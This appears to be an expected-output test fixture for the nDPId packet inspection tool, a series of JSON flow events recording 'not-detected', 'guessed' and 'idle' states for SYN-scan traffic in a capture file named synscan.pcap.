+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 